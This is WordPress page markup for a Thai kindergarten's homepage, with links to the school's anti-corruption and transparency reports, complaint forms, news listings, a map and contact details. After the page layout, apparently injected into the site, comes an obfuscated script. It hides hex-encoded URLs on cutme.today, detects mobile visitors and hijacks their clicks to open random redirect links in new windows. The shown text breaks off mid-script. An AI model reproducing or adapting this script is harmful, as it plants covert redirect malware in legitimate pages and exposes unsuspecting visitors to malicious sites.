href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 